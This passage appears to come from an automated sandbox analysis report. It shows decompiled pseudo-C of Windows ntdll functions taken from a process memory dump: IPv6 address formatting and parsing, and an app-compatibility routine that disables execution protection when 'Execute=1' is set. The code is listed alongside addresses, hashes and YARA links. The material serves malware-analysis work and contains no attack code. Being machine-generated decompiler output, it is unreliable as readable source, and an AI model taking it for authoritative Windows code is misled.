									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00977707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00977707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                                                                                              0x009813d5
                                                                                                                                                              0x009813d9
                                                                                                                                                              0x009813dc
                                                                                                                                                              0x009813de
                                                                                                                                                              0x009813e1
                                                                                                                                                              0x009813e8
                                                                                                                                                              0x009813ee
                                                                                                                                                              0x009ae8fd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ae921
                                                                                                                                                              0x009ae921
                                                                                                                                                              0x009ae928
                                                                                                                                                              0x009ae982
                                                                                                                                                              0x009ae98a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ae99a
                                                                                                                                                              0x009ae99e
                                                                                                                                                              0x009ae9a3
                                                                                                                                                              0x009ae9a8
                                                                                                                                                              0x009ae9b9
                                                                                                                                                              0x009ae978
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ae978
                                                                                                                                                              0x009ae98a
                                                                                                                                                              0x009ae92a
                                                                                                                                                              0x009ae931
                                                                                                                                                              0x009ae944
                                                                                                                                                              0x009ae944
                                                                                                                                                              0x009ae950
                                                                                                                                                              0x009ae954
                                                                                                                                                              0x009ae959
                                                                                                                                                              0x009ae95e
                                                                                                                                                              0x009ae963
                                                                                                                                                              0x009ae970
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ae975
                                                                                                                                                              0x009ae93b
                                                                                                                                                              0x009ae980
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ae980
                                                                                                                                                              0x009ae942
                                                                                                                                                              0x009ae94b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ae94b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009ae942
                                                                                                                                                              0x009813f4
                                                                                                                                                              0x009813f4
                                                                                                                                                              0x009813f9
                                                                                                                                                              0x009813fc
                                                                                                                                                              0x009813ff
                                                                                                                                                              0x00981406
                                                                                                                                                              0x009ae9cc
                                                                                                                                                              0x009ae9d2
                                                                                                                                                              0x009ae9d2
                                                                                                                                                              0x009ae9cc
                                                                                                                                                              0x0098140c
                                                                                                                                                              0x00981411
                                                                                                                                                              0x00981431
                                                                                                                                                              0x0098143a
                                                                                                                                                              0x0098143c
                                                                                                                                                              0x0098143f
                                                                                                                                                              0x0098143f
                                                                                                                                                              0x00981442
                                                                                                                                                              0x00981447
                                                                                                                                                              0x009814a8
                                                                                                                                                              0x009814ac
                                                                                                                                                              0x009ae9e2
                                                                                                                                                              0x009ae9e7
                                                                                                                                                              0x009ae9ec
                                                                                                                                                              0x009aea05
                                                                                                                                                              0x009aea05
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00981449
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00981449
                                                                                                                                                              0x0098144c
                                                                                                                                                              0x00981459
                                                                                                                                                              0x00981462
                                                                                                                                                              0x00981469
                                                                                                                                                              0x0098146a
                                                                                                                                                              0x00981470
                                                                                                                                                              0x00981473
                                                                                                                                                              0x00981476
                                                                                                                                                              0x00981476
                                                                                                                                                              0x00981490
                                                                                                                                                              0x00981495
                                                                                                                                                              0x0098138e
                                                                                                                                                              0x00981390
                                                                                                                                                              0x00981397
                                                                                                                                                              0x00981398
                                                                                                                                                              0x00981399
                                                                                                                                                              0x009813a1
                                                                                                                                                              0x009813a4
                                                                                                                                                              0x009813a4
                                                                                                                                                              0x00981498
                                                                                                                                                              0x0098149c
                                                                                                                                                              0x0098149f
                                                                                                                                                              0x009814a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009814a4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009814a4
                                                                                                                                                              0x00981413
                                                                                                                                                              0x00981415
                                                                                                                                                              0x00981416
                                                                                                                                                              0x00981419
                                                                                                                                                              0x0098141c
                                                                                                                                                              0x00981422
                                                                                                                                                              0x009813b7
                                                                                                                                                              0x009813bc
                                                                                                                                                              0x009813bf
                                                                                                                                                              0x009813bf
                                                                                                                                                              0x009813c2
                                                                                                                                                              0x00981424
                                                                                                                                                              0x00981424
                                                                                                                                                              0x00981424
                                                                                                                                                              0x00981427
                                                                                                                                                              0x0098142b
                                                                                                                                                              0x0098142c
                                                                                                                                                              0x0098142c
                                                                                                                                                              0x0098142c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0098141c
                                                                                                                                                              0x00981411

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233788008.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.2233781568.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233884852.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233899642.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233918032.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233924942.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233931438.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2234039934.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                                              • Opcode ID: cc640471f74393ce21c295a193f15ba6937764d5581769d8c62c744091806747
                                                                                                                                                              • Instruction ID: ef7fcf1c0bb4431f08cd4c5886169a084f6116a71e6d091af68b5298319836e0
                                                                                                                                                              • Opcode Fuzzy Hash: cc640471f74393ce21c295a193f15ba6937764d5581769d8c62c744091806747
                                                                                                                                                              • Instruction Fuzzy Hash: 9B611971904655AACF34EFA9C8808BFBBBDEFD5300B54C52EF4DA47640D234AA41CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00977EFD, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                              			E00977EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xa22088; // 0x7746be76
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00977F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00993F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0094DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xa24218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00993F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00950D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00993F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00958375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00993F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E009BE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00993F92();
					_t38 = 1;
					L2:
					return E0094E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                                                                                                              0x00977f08
                                                                                                                                                              0x00977f0f
                                                                                                                                                              0x00977f12
                                                                                                                                                              0x00977f1b
                                                                                                                                                              0x00977f31
                                                                                                                                                              0x00993ead
                                                                                                                                                              0x00993eb4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00993eba
                                                                                                                                                              0x00993ecd
                                                                                                                                                              0x00993ed2
                                                                                                                                                              0x00993ee1
                                                                                                                                                              0x00993ee7
                                                                                                                                                              0x00993eec
                                                                                                                                                              0x00993f12
                                                                                                                                                              0x00993f18
                                                                                                                                                              0x00993f1a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00993f20
                                                                                                                                                              0x00993f26
                                                                                                                                                              0x00993f28
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00993f2e
                                                                                                                                                              0x00993f30
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00993f3a
                                                                                                                                                              0x00993f3b
                                                                                                                                                              0x00993f53
                                                                                                                                                              0x00993f64
                                                                                                                                                              0x00993f69
                                                                                                                                                              0x00993f6c
                                                                                                                                                              0x00993f6d
                                                                                                                                                              0x00993f6f
                                                                                                                                                              0x0099e304
                                                                                                                                                              0x0099e30f
                                                                                                                                                              0x0099e315
                                                                                                                                                              0x0099e31e
                                                                                                                                                              0x0099e321
                                                                                                                                                              0x0099e327
                                                                                                                                                              0x0099e329
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099e32f
                                                                                                                                                              0x0099e32f
                                                                                                                                                              0x0099e337
                                                                                                                                                              0x0099e33a
                                                                                                                                                              0x0099e33b
                                                                                                                                                              0x0099e33d
                                                                                                                                                              0x0099e33f
                                                                                                                                                              0x0099e341
                                                                                                                                                              0x0099e341
                                                                                                                                                              0x0099e34e
                                                                                                                                                              0x0099e353
                                                                                                                                                              0x0099e358
                                                                                                                                                              0x0099e35d
                                                                                                                                                              0x0099e35f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099e365
                                                                                                                                                              0x0099e365
                                                                                                                                                              0x0099e368
                                                                                                                                                              0x0099e36e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099e374
                                                                                                                                                              0x0099e32f
                                                                                                                                                              0x00993f75
                                                                                                                                                              0x00993f7a
                                                                                                                                                              0x00993f7c
                                                                                                                                                              0x00993f7e
                                                                                                                                                              0x00993f86
                                                                                                                                                              0x00977f39
                                                                                                                                                              0x00977f47
                                                                                                                                                              0x00977f47
                                                                                                                                                              0x00977f37
                                                                                                                                                              0x00977f37
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00993F12
                                                                                                                                                              Strings
                                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00993F4A
                                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00993F75
                                                                                                                                                              • ExecuteOptions, xrefs: 00993F04
                                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 0099E345
                                                                                                                                                              • 'T, xrefs: 00977F1E
                                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0099E2FB
                                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00993EC4
                                                                                                                                                              • Execute=1, xrefs: 00993F5E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233788008.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.2233781568.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233884852.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233899642.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233918032.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233924942.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233931438.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2234039934.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BaseDataModuleQuery
                                                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$'T
                                                                                                                                                              • API String ID: 3901378454-2787919402
                                                                                                                                                              • Opcode ID: 8d27dc5c24f37baae20935fcc97e02403f95a3933c8b07e091d45d0fde62b8f3
                                                                                                                                                              • Instruction ID: 47390b47bd954c55c3769eec6c4fc2c5e6e3a0fa212b5a2b17cf9ddd15e27de0
                                                                                                                                                              • Opcode Fuzzy Hash: 8d27dc5c24f37baae20935fcc97e02403f95a3933c8b07e091d45d0fde62b8f3
                                                                                                                                                              • Instruction Fuzzy Hash: 3141B972A4021D7ADF20DF94DCC6FEAB3BCAB95704F0045A9F509E6181E670AB458F61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00980B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00980B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00958980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0094DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00980CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00980CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E009806BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E009806BA(_t135, _t178) == 0 || E00980A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00980CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00980CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E009806BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E009806BA(_t124, _t142) == 0 || E00980A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                                                                                                                              0x00980b21
                                                                                                                                                              0x00980b24
                                                                                                                                                              0x00980b27
                                                                                                                                                              0x00980b2a
                                                                                                                                                              0x00980b2d
                                                                                                                                                              0x00980b30
                                                                                                                                                              0x00980b33
                                                                                                                                                              0x00980b36
                                                                                                                                                              0x00980b39
                                                                                                                                                              0x00980b3e
                                                                                                                                                              0x00980c65
                                                                                                                                                              0x00980c68
                                                                                                                                                              0x00980c6a
                                                                                                                                                              0x00980c6f
                                                                                                                                                              0x009aeb42
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeb48
                                                                                                                                                              0x009aeb48
                                                                                                                                                              0x00980c75
                                                                                                                                                              0x00980c7a
                                                                                                                                                              0x009aeb54
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeb5a
                                                                                                                                                              0x00980c80
                                                                                                                                                              0x00980c84
                                                                                                                                                              0x009aeb98
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeba6
                                                                                                                                                              0x00980cb8
                                                                                                                                                              0x00980cba
                                                                                                                                                              0x00980cd3
                                                                                                                                                              0x00980cda
                                                                                                                                                              0x00980ce4
                                                                                                                                                              0x00980ce9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980cec
                                                                                                                                                              0x00980c8c
                                                                                                                                                              0x009aeb63
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeb70
                                                                                                                                                              0x009aeb75
                                                                                                                                                              0x009aeb7d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeb8c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeb8c
                                                                                                                                                              0x00980c96
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980ca2
                                                                                                                                                              0x00980cac
                                                                                                                                                              0x00980cb4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980b44
                                                                                                                                                              0x00980b47
                                                                                                                                                              0x00980b49
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980b4f
                                                                                                                                                              0x00980b50
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980b56
                                                                                                                                                              0x00980b62
                                                                                                                                                              0x00980b7c
                                                                                                                                                              0x00980bac
                                                                                                                                                              0x00980a0f
                                                                                                                                                              0x009aeaaa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeac4
                                                                                                                                                              0x009aeac4
                                                                                                                                                              0x00980bd0
                                                                                                                                                              0x00980bd0
                                                                                                                                                              0x00980bd4
                                                                                                                                                              0x00980bd9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980bdb
                                                                                                                                                              0x00980be0
                                                                                                                                                              0x009aeb0e
                                                                                                                                                              0x00980a1a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980a1a
                                                                                                                                                              0x009aeb1a
                                                                                                                                                              0x009aeb1f
                                                                                                                                                              0x009aeb27
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeb36
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeb36
                                                                                                                                                              0x00980bea
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980bf6
                                                                                                                                                              0x00980c00
                                                                                                                                                              0x00980c03
                                                                                                                                                              0x00980c0b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980c0b
                                                                                                                                                              0x009aeaaa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980a15
                                                                                                                                                              0x00980bb6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980bc6
                                                                                                                                                              0x00980bc6
                                                                                                                                                              0x00980bcb
                                                                                                                                                              0x00980c15
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980c1d
                                                                                                                                                              0x00980c20
                                                                                                                                                              0x00980c21
                                                                                                                                                              0x00980c24
                                                                                                                                                              0x00980c24
                                                                                                                                                              0x00980c26
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980c26
                                                                                                                                                              0x00980bcd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980bcd
                                                                                                                                                              0x00980b89
                                                                                                                                                              0x00980b89
                                                                                                                                                              0x00980b90
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980b96
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980b96
                                                                                                                                                              0x00980a04
                                                                                                                                                              0x00980a04
                                                                                                                                                              0x00980b9a
                                                                                                                                                              0x00980b9a
                                                                                                                                                              0x00980b9b
                                                                                                                                                              0x00980b9f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980ba5
                                                                                                                                                              0x00980ac7
                                                                                                                                                              0x00980aca
                                                                                                                                                              0x009aeacf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeade
                                                                                                                                                              0x009aeade
                                                                                                                                                              0x009aeae3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeaf3
                                                                                                                                                              0x009aeaf6
                                                                                                                                                              0x009aeaf7
                                                                                                                                                              0x009aeafe
                                                                                                                                                              0x009aeb01
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeb01
                                                                                                                                                              0x009aeacf
                                                                                                                                                              0x00980ad0
                                                                                                                                                              0x00980ad4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980ada
                                                                                                                                                              0x00980ae6
                                                                                                                                                              0x00980c34
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980c47
                                                                                                                                                              0x00980c49
                                                                                                                                                              0x00980c4a
                                                                                                                                                              0x00980c4e
                                                                                                                                                              0x00980c51
                                                                                                                                                              0x00980c54
                                                                                                                                                              0x00980c57
                                                                                                                                                              0x00980c5a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980c60
                                                                                                                                                              0x00980afb
                                                                                                                                                              0x00980afe
                                                                                                                                                              0x00980b02
                                                                                                                                                              0x00980b05
                                                                                                                                                              0x00980b08
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00980b08
                                                                                                                                                              0x00980ae6
                                                                                                                                                              0x00980b44
                                                                                                                                                              0x009809f8
                                                                                                                                                              0x009809f8
                                                                                                                                                              0x009809f9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009aeaa0
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.2233788008.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.2233781568.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233884852.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233899642.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233918032.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233924942.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2233931438.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000F.00000002.2234039934.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __fassign
                                                                                                                                                              • String ID: .$:$:
                                                                                                                                                              • API String ID: 3965848254-2308638275
                                                                                                                                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                              • Instruction ID: 83dd73e842587bd7084bbffb9717ff731d2d287d223a8f8d1de17edf7309f793
                                                                                                                                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                              • Instruction Fuzzy Hash: 98A1BD31D0030ADFDFA4EF64C8457BEB7B8AF95304F24856AD892A7341D7349A49CB91
